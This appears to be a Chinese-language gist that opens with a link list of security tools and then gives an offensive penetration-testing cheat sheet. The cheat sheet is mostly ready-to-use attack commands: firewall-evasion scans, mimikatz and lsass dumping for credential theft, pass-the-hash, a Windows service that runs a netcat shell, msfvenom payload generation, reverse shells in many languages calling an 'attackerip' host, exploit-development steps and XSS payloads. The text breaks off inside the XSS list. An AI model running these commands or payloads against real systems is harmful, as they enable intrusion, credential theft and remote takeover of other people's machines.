https://github.com/ysrc/F-Scrack (对各类服务进行弱口令检测的脚本) https://github.com/Mebus/cupp (根据用户习惯生成弱口令探测字典脚本) https://github.com/RicterZ/genpAss (中国特色的弱口令生成器) https://github.com/netxfly/crack_ssh (go写的协程版的ssh\redis\mongodb弱口令破解工具) https://github.com/n0tr00t/Sreg (通过输入email、phone、username的返回用户注册的所有互联网护照信息) https://github.com/repoog/GitPrey (GitHub敏感信息扫描工具) https://github.com/dxa4481/truffleHog (GitHub敏感信息扫描工具,包括检测commit等) https://github.com/LandGrey/pydictor (暴力破解字典建立工具) https://github.com/GDSSecurity/xxe-recursive-download (xxe漏洞递归下载工具) https://buer.haus/xxegen/ (xxe在线生成利用工具) 物联网设备扫描 https://github.com/rapid7/IoTSeeker (物联网设备默认密码扫描检测工具) https://github.com/shodan-labs/iotdb (使用nmap扫描IoT设备) https://github.com/jh00nbr/Routerhunter-2.0 (路由器漏洞扫描利用) https://github.com/reverse-shell/routersploit (路由器漏洞利用框架) https://github.com/scu-igroup/telnet-scanner (telnet服务密码撞库) https://github.com/RUB-NDS/PRET (打印机攻击框架) XSS扫描 https://github.com/shawarkhanethicalhacker/BruteXSS (Cross-Site Scripting Bruteforcer) https://github.com/1N3/XSSTracer (A small python script to check for Cross-Site Tracing) https://github.com/0x584A/fuzzXssPHP (PHP版本的反射型xss扫描) https://github.com/chuhades/xss_scan (批量扫描xss的python脚本) https://github.com/BlackHole1/autoFindXssAndCsrf (自动化检测页面是否存在XSS和CSRF漏洞的浏览器插件) 企业网络自检 https://github.com/sowish/LNScan (详细的内部网络信息扫描器) https://github.com/SkyLined/LocalNetworkScanner (javascript实现的本地网络扫描器) https://github.com/ysrc/xunfeng (网络资产识别引擎,漏洞检测引擎) https://github.com/laramies/theHarvester (企业被搜索引擎收录敏感资产信息监控脚本:员工邮箱、子域名、Hosts) https://github.com/x0day/Multisearch-v2 (搜索引擎聚合搜索,可用于发现企业被搜索引擎收录的敏感资产信息) webshell检测以及病毒分析工具 https://github.com/We5ter/Scanners-Box/tree/master/webshell/ (简单的php后门检测工具以及webshell样本库) https://github.com/ym2011/ScanBackdoor (Webshell扫描工具) https://github.com/yassineaddi/BackdoorMan (PHP后门扫描) https://github.com/he1m4n6a/findWebshell (又一款webshell检测工具) https://github.com/Tencent/HaboMalHunter (哈勃分析系统,linux系统病毒分析及安全检测) https://github.com/PlagueScanner/PlagueScanner (使用python实现的集成ClamAV、ESET、Bitdefender的反病毒引擎) https://github.com/nbs-system/php-malware-finder (一款高效率PHP-webshell扫描工具) https://github.com/emposha/PHP-Shell-Detector/ (测试效率高达99%的webshell检测工具) 内网安全渗透测试工具集 https://github.com/0xwindows/VulScritp (企业内网渗透脚本,包括banner扫描、端口扫描;各种通用漏洞利用等) https://github.com/lcatro/network_backdoor_scanner (基于网络流量的内网探测框架) https://github.com/fdiskyou/hunter (调用 Windows API 枚举用户登录信息) https://github.com/BlackHole1/WebRtcXSS (自动化利用XSS入侵内网) https://github.com/AlessandroZ/LaZagne (本机密码查看提取工具) https://github.com/huntergregal/mimipenguin (linux密码抓取神器) 端口扫描、指纹识别以及中间件扫描 https://nmap.org/download.html (Nmap端口扫描器之王,https://svn.nmap.org/) https://github.com/ring04h/wyportmap (目标端口扫描+系统服务指纹识别) https://github.com/ring04h/weakfilescan (动态多线程敏感信息泄露检测工具) https://github.com/EnableSecurity/wafw00f (WAF产品指纹识别) https://github.com/rbsec/sslscan (ssl类型识别) https://github.com/urbanadventurer/whatweb (web指纹识别) https://github.com/tanjiti/FingerPrint (web应用指纹识别) https://github.com/nanshihui/Scan-T (网络爬虫式指纹识别) https://github.com/OffensivePython/Nscan (a fast Network scanner inspired by Masscan and Zmap) https://github.com/ywolf/F-NAScan (网络资产信息扫描, ICMP存活探测,端口扫描,端口指纹服务识别) https://github.com/ywolf/F-MiddlewareScan (中间件扫描) https://github.com/maurosoria/dirsearch (Web path scanner) https://github.com/x0day/bannerscan (C段Banner与路径扫描) https://github.com/RASSec/RASscan (端口服务扫描) https://github.com/3xp10it/bypass_waf (waf自动暴破) https://github.com/3xp10it/xcdn (尝试找出cdn背后的真实ip) https://github.com/Xyntax/BingC (基于Bing搜索引擎的C段/旁站查询,多线程,支持API) https://github.com/Xyntax/DirBrute (多线程WEB目录爆破工具) https://github.com/zer0h/httpscan (一个爬虫式的网段Web主机发现小工具) https://github.com/lietdai/doom (thorn上实现的分布式任务分发的ip端口漏洞扫描器) https://github.com/chichou/grab.js (类似 zgrab 的快速 TCP 指纹抓取解析工具,支持更多协议) https://github.com/Nitr4x/whichCDN (CDN识别、检测) https://github.com/secfree/bcrpscan (基于爬虫的web路径扫描器) 针对性漏洞测试工具 https://github.com/brianwrf/hackUtils (java反序列化利用工具集) https://github.com/frohoff/ysoserial ( java反序列化利用工具) https://github.com/blackye/Jenkins (Jenkins漏洞探测、用户抓取爆破) https://github.com/code-scan/dzscan (discuz漏洞扫描) https://github.com/chuhades/CMS-Exploit-Framework (CMS攻击框架) https://github.com/lijiejie/IIS_shortname_Scanner (IIS短文件名漏洞扫描) https://github.com/riusksk/FlashScanner (flashxss扫描) https://github.com/coffeehb/SSTIF (服务器端模板注入漏洞的半自动化工具) https://github.com/epinna/tplmap (服务器端模板注入漏洞检测与利用工具) https://github.com/cr0hn/dockerscan (docker扫描工具) https://github.com/GoSecure/break-fast-serial (借助DNS解析来检测Java反序列化漏洞工具) https://github.com/dirtycow/dirtycow.github.io (脏牛提权漏洞exp) 无线网络渗透、扫描 https://github.com/savio-code/fern-wifi-cracker/ (无线安全审计工具) https://github.com/m4n3dw0lf/PytheM (Python网络/渗透测试工具) https://github.com/P0cL4bs/WiFi-Pumpkin (无线安全渗透测试套件) 代码静态扫描、代码运行栈跟踪 https://github.com/exakat/php-static-analysis-tools (php静态扫描工具集) https://github.com/wufeifei/cobra (白盒代码安全审计系统) https://github.com/OneSourceCat/phpvulhunter (静态php代码审计) https://github.com/Qihoo360/phptrace (跟踪、分析PHP运行情况的工具) https://github.com/ajinabraham/NodeJsScan (NodeJS应用代码审计) https://github.com/pwnsdx/BadCode (PHP代码审计) https://github.com/thesp0nge/dawnscanner (ruby源码审计) https://github.com/presidentbeef/brakeman (Ruby on Rails应用程序的安全漏洞) https://github.com/ajinabraham/Mobile-Security-Framework-MobSF/ (app黑盒审计) https://github.com/alibaba/iOSSecAudit (iOS安全审计) 模块化扫描、综合扫描器 https://github.com/az0ne/AZScanner (自动漏洞扫描器,子域名爆破,端口扫描,目录爆破,常用框架漏洞检测) https://github.com/blackye/lalascan (分布式web漏洞扫描框架,集合owasp top10漏洞扫描和边界资产发现能力) https://github.com/blackye/BkScanner (BkScanner 分布式、插件化web漏洞扫描器) https://github.com/ysrc/GourdScanV2 (被动式漏洞扫描) https://github.com/alpha1e0/pentestdb (WEB渗透测试数据库) https://github.com/netxfly/passive_scan (基于http代理的web漏洞扫描器) https://github.com/1N3/Sn1per (自动化扫描器,包括中间件扫描以及设备指纹识别) https://github.com/RASSec/pentestEr_Fully-automatic-scanner (定向全自动化渗透测试工具) https://github.com/3xp10it/3xp10it (自动化渗透测试框架) https://github.com/Lcys/lcyscan (扫描效果未验证) https://github.com/Xyntax/POC-T (渗透测试插件化并发框架) https://github.com/v3n0m-Scanner/V3n0M-Scanner (Scanner in Python3.5 for SQLi/XSS/LFI/RFI and other Vulns) https://github.com/Skycrab/leakScan (web端的在线漏洞扫描) https://github.com/zhangzhenfeng/AnyScan (开发中…) Android系列工具: http://sec-redclub.com/index.php/archives/439/ DDOS防护: https://github.com/ywjt/Dshield Database firewall: https://nim4.github.io/DBShield/ waf开源及规则: https://github.com/xsec-lab/x-waf https://github.com/loveshell/ngx_lua_waf https://github.com/SpiderLabs/owasp-modsecurity-crs/tree/master/base_rules -
May 27, 2016 .There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,888 @@ 最好的 NMAP 扫描策略 # 适用所有大小网络最好的 nmap 扫描策略 # 主机发现,生成存活主机列表 $ nmap -sn -T4 -oG Discovery.gnmap 192.168.56.0/24 $ grep "Status: Up" Discovery.gnmap | cut -f 2 -d ' ' > LiveHosts.txt # 端口发现,发现大部分常用端口 # http://nmap.org/presentations/BHDC08/bhdc08-slides-fyodor.pdf $ nmap -sS -T4 -Pn -oG TopTCP -iL LiveHosts.txt $ nmap -sU -T4 -Pn -oN TopUDP -iL LiveHosts.txt $ nmap -sS -T4 -Pn --top-ports 3674 -oG 3674 -iL LiveHosts.txt # 端口发现,发现全部端口,但 UDP 端口的扫描会非常慢 $ nmap -sS -T4 -Pn -p 0-65535 -oN FullTCP -iL LiveHosts.txt $ nmap -sU -T4 -Pn -p 0-65535 -oN FullUDP -iL LiveHosts.txt # 显示 TCP\UDP 端口 $ grep "open" FullTCP|cut -f 1 -d ' ' | sort -nu | cut -f 1 -d '/' |xargs | sed 's/ /,/g'|awk '{print "T:"$0}' $ grep "open" FullUDP|cut -f 1 -d ' ' | sort -nu | cut -f 1 -d '/' |xargs | sed 's/ /,/g'|awk '{print "U:"$0}' # 侦测服务版本 $ nmap -sV -T4 -Pn -oG ServiceDetect -iL LiveHosts.txt # 扫做系统扫描 $ nmap -O -T4 -Pn -oG OSDetect -iL LiveHosts.txt # 系统和服务检测 $ nmap -O -sV -T4 -Pn -p U:53,111,137,T:21-25,80,139,8080 -oG OS_Service_Detect -iL LiveHosts.txt Nmap – 躲避防火墙 # 分段 $ nmap -f # 修改默认 MTU 大小,但必须为 8 的倍数(8,16,24,32 等等) $ nmap --mtu 24 # 生成随机数量的欺骗 $ nmap -D RND:10 [target] # 手动指定欺骗使用的 IP $ nmap -D decoy1,decoy2,decoy3 etc. # 僵尸网络扫描, 首先需要找到僵尸网络的IP $ nmap -sI [Zombie IP] [Target IP] # 指定源端口号 $ nmap --source-port 80 IP # 在每个扫描数据包后追加随机数量的数据 $ nmap --data-length 25 IP # MAC 地址欺骗,可以生成不同主机的 MAC 地址 $ nmap --spoof-mac Dell/Apple/3Com IP Nmap 进行 Web 漏洞扫描 cd /usr/share/nmap/scripts/ wget http://www.computec.ch/projekte/vulscan/download/nmap_nse_vulscan-2.0.tar.gz && tar xzf nmap_nse_vulscan-2.0.tar.gz nmap -sS -sV --script=vulscan/vulscan.nse target nmap -sS -sV --script=vulscan/vulscan.nse –script-args vulscandb=scipvuldb.csv target nmap -sS -sV --script=vulscan/vulscan.nse –script-args vulscandb=scipvuldb.csv -p80 target nmap -PN -sS -sV --script=vulscan –script-args vulscancorrelation=1 -p80 target nmap -sV --script=vuln target nmap -PN -sS -sV --script=all –script-args vulscancorrelation=1 target 使用 DIRB 爆破目录 注:DIRB 是一个专门用于爆破目录的工具,在 Kali 中默认已经安装,类似工具还有国外的patator,dirsearch,DirBuster, 国内的御剑等等。 dirb http://IP:PORT /usr/share/dirb/wordlists/common.txt Patator – 全能暴力破解测试工具 # git clone https://github.com/lanjelot/patator.git /usr/share/patator # SMTP 爆破 $ patator smtp_login host=192.168.17.129 user=Ololena password=FILE0 0=/usr/share/john/password.lst $ patator smtp_login host=192.168.17.129 user=FILE1 password=FILE0 0=/usr/share/john/password.lst 1=/usr/share/john/usernames.lst $ patator smtp_login host=192.168.17.129 helo='ehlo 192.168.17.128' user=FILE1 password=FILE0 0=/usr/share/john/password.lst 1=/usr/share/john/usernames.lst $ patator smtp_login host=192.168.17.129 user=Ololena password=FILE0 0=/usr/share/john/password.lst -x ignore:fgrep='incorrect password or account name' 使用 Fierce 爆破 DNS 注:Fierce 会检查 DNS 服务器是否允许区域传送。如果允许,就会进行区域传送并通知用户,如果不允许,则可以通过查询 DNS 服务器枚举主机名。类似工具:subDomainsBrute 和 SubBrute 等等 # http://ha.ckers.org/fierce/ $ ./fierce.pl -dns example.com $ ./fierce.pl –dns example.com –wordlist myWordList.txt 使用 Nikto 扫描 Web 服务 nikto -C all -h http://IP 扫描 WordPress git clone https://github.com/wpscanteam/wpscan.git && cd wpscan ./wpscan –url http://IP/ –enumerate p HTTP 指纹识别 wget http://www.net-square.com/_assets/httprint_linux_301.zip && unzip httprint_linux_301.zip cd httprint_301/linux/ ./httprint -h http://IP -s signatures.txt 使用 Skipfish 扫描 注:Skipfish 是一款 Web 应用安全侦查工具,Skipfish 会利用递归爬虫和基于字典的探针生成一幅交互式网站地图,最终生成的地图会在通过安全检查后输出。 skipfish -m 5 -LY -S /usr/share/skipfish/dictionaries/complete.wl -o ./skipfish2 -u http://IP 使用 NC 扫描 nc -v -w 1 target -z 1-1000 for i in {101..102}; do nc -vv -n -w 1 192.168.56.$i 21-25 -z; done Unicornscan 注:Unicornscan 是一个信息收集和安全审计的工具。 us -H -msf -Iv 192.168.56.101 -p 1-65535 us -H -mU -Iv 192.168.56.101 -p 1-65535 -H 在生成报告阶段解析主机名 -m 扫描类型 (sf - tcp, U - udp) -Iv - 详细 使用 Xprobe2 识别操作系统指纹 xprobe2 -v -p tcp:80:open IP 枚举 Samba nmblookup -A target smbclient //MOUNT/share -I target -N rpcclient -U "" target enum4linux target 枚举 SNMP snmpget -v 1 -c public IP snmpwalk -v 1 -c public IP snmpbulkwalk -v2c -c public -Cn0 -Cr10 IP 实用的 Windows cmd 命令 net localgroup Users net localgroup Administrators search dir/s *.doc system("start cmd.exe /k $cmd") sc create microsoft_update binpath="cmd /K start c:\nc.exe -d ip-of-hacker port -e cmd.exe" start= auto error= ignore /c C:\nc.exe -e c:\windows\system32\cmd.exe -vv 23.92.17.103 7779 mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords" Procdump.exe -accepteula -ma lsass.exe lsass.dmp mimikatz.exe "sekurlsa::minidump lsass.dmp" "log" "sekurlsa::logonpasswords" C:\temp\procdump.exe -accepteula -ma lsass.exe lsass.dmp 32 位系统 C:\temp\procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp 64 位系统 PuTTY 连接隧道 转发远程端口到目标地址 plink.exe -P 22 -l root -pw "1234" -R 445:127.0.0.1:445 IP Meterpreter 端口转发 # https://www.offensive-security.com/metasploit-unleashed/portfwd/ # 转发远程端口到目标地址 meterpreter > portfwd add –l 3389 –p 3389 –r 172.16.194.141 kali > rdesktop 127.0.0.1:3389 开启 RDP 服务 reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0 netsh firewall set service remoteadmin enable netsh firewall set service remotedesktop enable 关闭 Windows 防火墙 netsh firewall set opmode disable Meterpreter VNC\RDP # https://www.offensive-security.com/metasploit-unleashed/enabling-remote-desktop/ run getgui -u admin -p 1234 run vnc -p 5043 使用 Mimikatz 获取 Windows 明文用户名密码 git clone https://github.com/gentilkiwi/mimikatz.git privilege::debug sekurlsa::logonPasswords full 获取哈希值 git clone https://github.com/byt3bl33d3r/pth-toolkit pth-winexe -U hash //IP cmd 或者 apt-get install freerdp-x11 xfreerdp /u:offsec /d:win2012 /pth:HASH /v:IP 在或者 meterpreter > run post/windows/gather/hashdump Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c::: msf > use exploit/windows/smb/psexec msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp msf exploit(psexec) > set SMBPass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c msf exploit(psexec) > exploit meterpreter > shell 使用 Hashcat 破解密码 hashcat -m 400 -a 0 hash /root/rockyou.txt 使用 NC 抓取 Banner 信息 nc 192.168.0.10 80 GET / HTTP/1.1 Host: 192.168.0.10 User-Agent: Mozilla/4.0 Referrer: www.example.com <enter> <enter> 使用 NC 在 Windows 上反弹 shell c:>nc -Lp 31337 -vv -e cmd.exe nc 192.168.0.10 31337 c:>nc example.com 80 -e cmd.exe nc -lp 80 nc -lp 31337 -e /bin/bash nc 192.168.0.10 31337 nc -vv -r(random) -w(wait) 1 192.168.0.10 -z(i/o error) 1-1000 查找 SUID\SGID root 文件 # 查找 SUID root 文件 find / -user root -perm -4000 -print # 查找 SGID root 文件: find / -group root -perm -2000 -print # 查找 SUID 和 SGID 文件: find / -perm -4000 -o -perm -2000 -print # 查找不属于任何用户的文件: find / -nouser -print # 查找不属于任何用户组的文件: find / -nogroup -print # 查找软连接及其指向: find / -type l -ls Python shell python -c 'import pty;pty.spawn("/bin/bash")' Python\Ruby\PHP HTTP 服务器 python2 -m SimpleHTTPServer python3 -m http.server ruby -rwebrick -e "WEBrick::HTTPServer.new(:Port => 8888, :D ocumentRoot => Dir.pwd).start" php -S 0.0.0.0:8888 获取进程对应的 PID fuser -nv tcp 80 fuser -k -n tcp 80 使用 Hydra 爆破 RDP hydra -l admin -P /root/Desktop/passwords -S X.X.X.X rdp 挂载远程 Windows 共享文件夹 smbmount //X.X.X.X/c$ /mnt/remote/ -o username=user,password=pass,rw Kali 下编译 Exploit gcc -m32 -o output32 hello.c (32 位) gcc -m64 -o output hello.c (64 位) Kali 下编译 Windows Exploit wget -O mingw-get-setup.exe http://sourceforge.net/projects/mingw/files/Installer/mingw-get-setup.exe/download wine mingw-get-setup.exe select mingw32-base cd /root/.wine/drive_c/windows wget http://gojhonny.com/misc/mingw_bin.zip && unzip mingw_bin.zip cd /root/.wine/drive_c/MinGW/bin wine gcc -o ability.exe /tmp/exploit.c -lwsock32 wine ability.exe NASM 命令 注:NASM 全称 The Netwide Assembler,是一款基于80×86和x86-64平台的汇编语言编译程序,其设计初衷是为了实现编译器程序跨平台和模块化的特性。 nasm -f bin -o payload.bin payload.asm nasm -f elf payload.asm; ld -o payload payload.o; objdump -d payload SSH 穿透 ssh -D 127.0.0.1:1080 -p 22 user@IP Add socks4 127.0.0.1 1080 in /etc/proxychains.conf proxychains commands target SSH 穿透从一个网络到另一个网络 ssh -D 127.0.0.1:1080 -p 22 user1@IP1 Add socks4 127.0.0.1 1080 in /etc/proxychains.conf proxychains ssh -D 127.0.0.1:1081 -p 22 user1@IP2 Add socks4 127.0.0.1 1081 in /etc/proxychains.conf proxychains commands target 使用 metasploit 进行穿透 route add X.X.X.X 255.255.255.0 1 use auxiliary/server/socks4a run proxychains msfcli windows/* PAYLOAD=windows/meterpreter/reverse_tcp LHOST=IP LPORT=443 RHOST=IP E 或者 # https://www.offensive-security.com/metasploit-unleashed/pivoting/ meterpreter > ipconfig IP Address : 10.1.13.3 meterpreter > run autoroute -s 10.1.13.0/24 meterpreter > run autoroute -p 10.1.13.0 255.255.255.0 Session 1 meterpreter > Ctrl+Z msf auxiliary(tcp) > use exploit/windows/smb/psexec msf exploit(psexec) > set RHOST 10.1.13.2 msf exploit(psexec) > exploit meterpreter > ipconfig IP Address : 10.1.13.2 基于 CSV 文件查询 Exploit-DB git clone https://github.com/offensive-security/exploit-database.git cd exploit-database ./searchsploit –u ./searchsploit apache 2.2 ./searchsploit "Linux Kernel" cat files.csv | grep -i linux | grep -i kernel | grep -i local | grep -v dos | uniq | grep 2.6 | egrep "<|<=" | sort -k3 MSF Payloads msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP Address> X > system.exe msfvenom -p php/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 R > exploit.php msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 -e -a x86 --platform win -f asp -o file.asp msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 -e x86/shikata_ga_nai -b "\x00" -a x86 --platform win -f c MSF 生成在 Linux 下反弹的 Meterpreter Shell msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 -e -f elf -a x86 --platform linux -o shell MSF 生成反弹 Shell (C Shellcode) msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=443 -b "\x00\x0a\x0d" -a x86 --platform win -f c MSF 生成反弹 Python Shell msfvenom -p cmd/unix/reverse_python LHOST=127.0.0.1 LPORT=443 -o shell.py MSF 生成反弹 ASP Shell msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp -a x86 --platform win -o shell.asp MSF 生成反弹 Bash Shell msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -o shell.sh MSF 生成反弹 PHP Shell msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -o shell.php add <?php at the beginning perl -i~ -0777pe's/^/<?php \n/' shell.php MSF 生成反弹 Win Shell msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe -a x86 --platform win -o shell.exe Linux 常用安全命令 # 使用 uid 查找对应的程序 find / -uid 0 -perm -4000 # 查找哪里拥有写权限 find / -perm -o=w # 查找名称中包含点和空格的文件 find / -name " " -print find / -name ".." -print find / -name ". " -print find / -name " " -print # 查找不属于任何人的文件 find / -nouser # 查找未链接的文件 lsof +L1 # 获取进程打开端口的信息 lsof -i # 看看 ARP 表中是否有奇怪的东西 arp -a # 查看所有账户 getent passwd # 查看所有用户组 getent group # 列举所有用户的 crontabs for user in $(getent passwd|cut -f1 -d:); do echo "### Crontabs for $user ####"; crontab -u $user -l; done # 生成随机密码 cat /dev/urandom| tr -dc ‘a-zA-Z0-9-_!@#$%^&*()_+{}|:<>?=’|fold -w 12| head -n 4 # 查找所有不可修改的文件 find . | xargs -I file lsattr -a file 2>/dev/null | grep ‘^….i’ # 使文件不可修改 chattr -i file Windows 缓冲区溢出利用命令 msfvenom -p windows/shell_bind_tcp -a x86 --platform win -b "\x00" -f c msfvenom -p windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=443 -a x86 --platform win -e x86/shikata_ga_nai -b "\x00" -f c COMMONLY USED BAD CHARACTERS: \x00\x0a\x0d\x20 For http request \x00\x0a\x0d\x20\x1a\x2c\x2e\3a\x5c Ending with (0\n\r_) # 常用命令: pattern create pattern offset (EIP Address) pattern offset (ESP Address) add garbage upto EIP value and add (JMP ESP address) in EIP . (ESP = shellcode ) !pvefindaddr pattern_create 5000 !pvefindaddr suggest !pvefindaddr modules !pvefindaddr nosafeseh !mona config -set workingfolder C:\Mona\%p !mona config -get workingfolder !mona mod !mona bytearray -b "\x00\x0a" !mona pc 5000 !mona po EIP !mona suggest SEH – 结构化异常处理 注:SEH(“Structured Exception Handling”),即结构化异常处理,是 windows 操作系统提供给程序设计者的强有力的处理程序错误或异常的武器。 # https://en.wikipedia.org/wiki/Microsoft-specific_exception_handling_mechanisms#SEH # http://baike.baidu.com/view/243131.htm !mona suggest !mona nosafeseh nseh="\xeb\x06\x90\x90" (next seh chain) iseh= !pvefindaddr p1 -n -o -i (POP POP RETRUN or POPr32,POPr32,RETN) ROP (DEP) 注:ROP(“Return-Oriented Programming”)是计算机安全漏洞利用技术,该技术允许攻击者在安全防御的情况下执行代码,如不可执行的内存和代码签名。 DEP(“Data Execution Prevention”)是一套软硬件技术,在内存上严格将代码和数据进行区分,防止数据当做代码执行。 # https://en.wikipedia.org/wiki/Return-oriented_programming # https://zh.wikipedia.org/wiki/%E8%BF%94%E5%9B%9E%E5%AF%BC%E5%90%91%E7%BC%96%E7%A8%8B # https://en.wikipedia.org/wiki/Data_Execution_Prevention # http://baike.baidu.com/item/DEP/7694630 !mona modules !mona ropfunc -m *.dll -cpb "\x00\x09\x0a" !mona rop -m *.dll -cpb "\x00\x09\x0a" (auto suggest) ASLR – 地址空间格局随机化 # https://en.wikipedia.org/wiki/Address_space_layout_randomization # http://baike.baidu.com/view/3862310.htm !mona noaslr 寻蛋(EGG Hunter)技术 Egg hunting这种技术可以被归为“分级shellcode”,它主要可以支持你用一小段特制的shellcode来找到你的实际的(更大的)shellcode(我们的‘鸡蛋‘),原理就是通过在内存中搜索我们的最终shellcode。换句话说,一段短代码先执行,然后再去寻找真正的shellcode并执行。– 参考自看雪论坛,更多详情可以查阅我在代码注释中增加的链接。 # https://www.corelan.be/index.php/2010/01/09/exploit-writing-tutorial-part-8-win32-egg-hunting/ # http://www.pediy.com/kssd/pediy12/116190/831793/45248.pdf # http://www.fuzzysecurity.com/tutorials/expDev/4.html !mona jmp -r esp !mona egg -t lxxl \xeb\xc4 (jump backward -60) buff=lxxllxxl+shell !mona egg -t 'w00t' GDB Debugger 常用命令 # 设置断点 break *_start # 执行下一个命令 next step n s # 继续执行 continue c # 数据 checking 'REGISTERS' and 'MEMORY' # 显示寄存器的值: (Decimal,Binary,Hex) print /d –> Decimal print /t –> Binary print /x –> Hex O/P : (gdb) print /d $eax $17 = 13 (gdb) print /t $eax $18 = 1101 (gdb) print /x $eax $19 = 0xd (gdb) # 显示特定内存地址的值 command : x/nyz (Examine) n –> Number of fields to display ==> y –> Format for output ==> c (character) , d (decimal) , x (Hexadecimal) z –> Size of field to be displayed ==> b (byte) , h (halfword), w (word 32 Bit) BASH 反弹 Shell bash -i >& /dev/tcp/X.X.X.X/443 0>&1 exec /bin/bash 0&0 2>&0 exec /bin/bash 0&0 2>&0 0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196 0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196 exec 5<>/dev/tcp/attackerip/4444 cat <&5 | while read line; do $line 2>&5 >&5; done # or: while read line 0<&5; do $line 2>&5 >&5; done exec 5<>/dev/tcp/attackerip/4444 cat <&5 | while read line; do $line 2>&5 >&5; done # or: while read line 0<&5; do $line 2>&5 >&5; done /bin/bash -i > /dev/tcp/attackerip/8080 0<&1 2>&1 /bin/bash -i > /dev/tcp/X.X.X.X/443 0<&1 2>&1 PERL 反弹 Shell perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"attackerip:443");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' # Win 平台 perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};’ RUBY 反弹 Shell ruby -rsocket -e 'exit if fork;c=TCPSocket.new("attackerip","443");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' # Win 平台 ruby -rsocket -e 'c=TCPSocket.new("attackerip","443");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' ruby -rsocket -e 'f=TCPSocket.open("attackerip","443").to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' PYTHON 反弹 Shell python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attackerip",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' PHP 反弹 Shell php -r '$sock=fsockopen("attackerip",443);exec("/bin/sh -i <&3 >&3 2>&3");' JAVA 反弹 Shell r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/attackerip/443;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor() NETCAT 反弹 Shell nc -e /bin/sh attackerip 4444 nc -e /bin/sh 192.168.37.10 443 # 如果 -e 参数被禁用,可以尝试以下命令 # mknod backpipe p && nc attackerip 443 0<backpipe | /bin/bash 1>backpipe /bin/sh | nc attackerip 443 rm -f /tmp/p; mknod /tmp/p p && nc attackerip 4443 0/tmp/ # 如果你安装错了 netcat 的版本,请尝试以下命令 rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attackerip >/tmp/f TELNET 反弹 Shell # 如果 netcat 不可用或者 /dev/tcp mknod backpipe p && telnet attackerip 443 0<backpipe | /bin/bash 1>backpipe XTERM 反弹 Shell # http://baike.baidu.com/view/418628.htm # 开启 X 服务器 (:1 – 监听 TCP 端口 6001) apt-get install xnest Xnest :1 # 记得授权来自目标 IP 的连接 xterm -display 127.0.0.1:1 # 授权访问 xhost +targetip # 在目标机器上连接回我们的 X 服务器 xterm -display attackerip:1 /usr/openwin/bin/xterm -display attackerip:1 or $ DISPLAY=attackerip:0 xterm XSS 备忘录 https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet ("< iframes > src=http://IP:PORT </ iframes >") <script>document.location=http://IP:PORT</script> ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//–></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> ";!–"<XSS>=&amp;{()} <IMG SRC="javascript:alert('XSS');"> <IMG SRC=javascript:alert('XSS')> <IMG """><SCRIPT>alert("XSS")</SCRIPT>""> <IMG 